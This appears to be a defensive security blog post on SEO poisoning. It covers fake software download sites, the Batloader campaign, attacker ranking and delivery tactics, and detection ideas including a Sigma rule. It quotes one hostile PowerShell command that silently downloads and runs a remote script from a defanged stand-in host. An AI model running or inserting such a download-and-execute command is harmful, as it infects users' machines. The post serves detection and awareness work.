SEO Poisoning Attacks: When Google Becomes the Attack Vector

Imagine you’re downloading Zoom or Slack and you google "Zoom download" click the first result (because who doesn’t?), and… BAM! You’ve just handed your system to an attacker. Welcome to the dark side of SEO: Search Engine Optimization poisoning.

Modern threat actors are leveraging search engines - the very thing we trust, to compromise systems. In this blog, we explore how SEO poisoning is used for initial access, how to detect it, and what defenders can do to build resilient detection strategies.

What is SEO Poisoning?

SEO poisoning is when attackers create malicious websites and use search engine optimization (SEO) techniques to rank them high in search engine results. These sites often mimic legitimate ones and are designed to lure users into downloading malware, stealing credentials, or executing scripts.

Common Lures:

Fake software installers (Zoom, Slack, ChatGPT)
Clone login pages
Malicious PDFs with embedded links

Real-World Examples

Batloader Campaign (2022–2023)

Attackers created SEO optimized fake websites mimicking Zoom, Visual Studio Code, and other legitimate software.
When users searched for "Download Zoom" the top links were poisoned, leading to a fake installer that initiated infection.
Users downloaded .msi or .iso files.
These dropped BATLOADER, a malware used for initial access.
Follow-up payloads: Cobalt Strike, Atera agent, or remote access trojans.

Sample Execution Chain:

powershell -WindowStyle hidden -ExecutionPolicy Bypass -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('hxxps://malicious-site[.]com/update.ps1')"

Technical Breakdown: How SEO Poisoning Works

SEO poisoning attacks are not just about throwing up a fake website, they're a calculated abuse of how search engines rank and present content. Let’s dig into the core technical mechanisms behind these attacks:

Step-by-Step Technical Workflow of an SEO Poisoning Campaign

Domain Registration and Hosting
- Threat actors register domains that resemble legitimate software vendors (e.g., zoom-downloads[.]xyz, slack-app[.]site).
- Hosting is often done using compromised servers or cheap VPS services, sometimes protected with Cloudflare or bulletproof hosting to prevent takedown.
Search Engine Optimization Tactics
- Keyword Stuffing: Attackers inject popular keywords like "free download", "official", "latest version" into HTML metadata, headings, and body.
- Backlink Generation: Threat actors create or compromise blogs/forums to post backlinks to their malicious site to increase Google/Bing ranking.
- Cloaking: The site might display benign content to search engine crawlers but serve malware to real users using User-Agent filtering.
Malware Delivery Methods
- MSI Installers: Custom Windows Installer packages that download and execute additional payloads using powershell.exe, curl, or bitsadmin.
- ISO Archives or LNK Files: In some campaigns, malicious ISO files are used to evade SmartScreen and Defender.
- Signed EXEs: Occasionally, attackers use code-signed executables to avoid detection and build trust.
Execution: The user installs malware believing it's legit software.
Command & Control: Malware establishes C2 for further exploitation.

Detection Engineering Considerations

Behavioral Detection:

Detect browser.exe spawning powershell.exe, cmd.exe, or any unsigned .exe.
Look for MSI installers or ISOs downloaded from newly registered or untrusted domains.

Hunting Queries (Sigma Style):

A sample sigma rule for such a detection could be: (Note, you may be required to modify it to work in your environment as needed)

title: Browser Spawning PowerShell
id: a11b60f6-c718-4c25-b12a-1e68bad8101c  # (optional, but recommended for tracking)
status: experimental  # could be stable, experimental, or deprecated
description: Detects browsers spawning PowerShell, which can indicate malicious activity like script-based attacks or phishing payloads.
author: your_name_or_team
date: 2025/04/07
logsource:
	category: process_creation
	product: windows
detection:
	selection:
		parent_image|endswith:
			- '\chrome.exe'
			- '\firefox.exe'
			- '\msedge.exe'
		image|endswith: '\powershell.exe'
	condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001  # PowerShell

Threat Intel Indicators:

TLDs like .xyz, .top, or .click
WHOIS data showing registration within the last 30 days
Traffic from high-ranking search referrals leading to malicious file downloads

Sandbox Analysis:

Use VMRay, Any.Run, JoeSandbox, or Cuckoo to observe dropped payloads.
Check for child process behavior: rundll32, cmd.exe, etc.

YARA Rules

Create custom YARA signatures for artifacts used in malware disguised as installers (based on string patterns and PE characteristics).

Mitigations & Recommendations

DNS Filtering: Block newly registered domains and suspicious TLDs (like .xyz, .click, .top).
User Awareness: Train users on identifying safe download sources.
EDR Monitoring: Enable file reputation checks and script block logging.
Threat Intelligence Integration: Leverage TI feeds to enrich SIEM alerts with known poisoned domains

SEO poisoning isn’t just an annoyance, it’s a growing initial access vector. Detection involves cross-log correlation: web logs, DNS, process creation, and file downloads. Prevention is tough, so early stage detection and user behavior monitoring are key.

By understanding the depth and breadth of SEO poisoning attacks, defenders can move beyond signature-based detection and embrace behavioral-based hunting. This also equips SOC teams to build proactive detections that trigger before the malware fully executes, targeting the early stages of the kill chain.

Happy cyber-exploration! 🚀🔒

Note: Feel free to drop your thoughts in the comments below - whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!

-AJ